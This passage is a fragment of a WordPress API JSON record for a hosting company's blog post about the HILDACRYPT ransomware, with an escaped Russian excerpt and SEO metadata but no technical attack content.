\u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-52277","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-11-04T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T10:59:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47HILDACRYPT: neues Ransomware-Programm greift Backup-Systeme und Antivirenl\u00f6sungen an | ProHoster","description":"Hallo, Habr! Wieder berichten wir \u00fcber die neuesten Versionen von Malware aus der Kategorie Ransomware.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster","og:description":"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-11-04T21:00:00+00:00","article:modified_time":"2020-02-18T10:59:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"52277","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 03:06:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 17:13:20","updated":"2026-01-24 03:06:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/52277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=52277"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/52277\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=52277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=52277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=52277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}